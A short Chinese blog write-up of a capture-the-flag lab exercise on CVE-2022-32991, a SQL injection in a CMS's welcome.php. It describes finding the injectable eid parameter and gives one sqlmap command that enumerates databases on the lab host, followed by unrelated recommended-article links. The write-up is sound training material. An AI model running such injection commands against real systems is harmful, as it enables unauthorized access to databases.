[春秋云境] CVE-2022-32991

不想学密码的程序员不是好的攻城狮2023-09-23 14:14

CVE-2022-32991

靶标介绍

该CMS的welcome.php中存在SQL注入攻击。

解题过程

进入主界面,没有明显可以注入的地方,先注册登录。

登录之后的界面
此处有个?q=1但是多次测试后,感觉不是注入点。
点击这个按钮,进入新的界面。
多次测试发现注入点

sqlmap梭哈

复制代码 
sqlmap -u "http://eci-2zeb8alt7sk432zz6n7j.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e*&n=1&t=10" --dbs

sqlmap指定参数进行注入

相关推荐
该用户已不存在1 小时前
Mojo vs Python vs Rust: 2025年搞AI,该学哪个?
后端·python·rust
站大爷IP3 小时前
Java调用Python的5种实用方案:从简单到进阶的全场景解析
python
用户8356290780519 小时前
从手动编辑到代码生成:Python 助你高效创建 Word 文档
后端·python
c8i9 小时前
python中类的基本结构、特殊属性于MRO理解
python
liwulin05069 小时前
【ESP32-CAM】HELLO WORLD
python
Doris_202310 小时前
Python条件判断语句 if、elif 、else
前端·后端·python
Doris_202310 小时前
Python 模式匹配match case
前端·后端·python
这里有鱼汤10 小时前
Python量化实盘踩坑指南:分钟K线没处理好,小心直接亏钱!
后端·python·程序员
大模型真好玩11 小时前
深入浅出LangGraph AI Agent智能体开发教程(五)—LangGraph 数据分析助手智能体项目实战
人工智能·python·mcp
测试老哥11 小时前
Selenium 使用指南
自动化测试·软件测试·python·selenium·测试工具·职场和发展·测试用例
热门推荐
01GitHub 镜像站点02UV 工具安装与国内镜像源配置指南03UV安装并设置国内源04Claude Code 平替:OpenAI发布 Codex CLI ,GPT-5 国内直接使用0546个Nano-banana 精选提示词,持续更新中06conda中设置镜像地址(附所有可换的地址)07A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程08保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)09KGG转MP3工具|非KGM文件|解密音频10解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题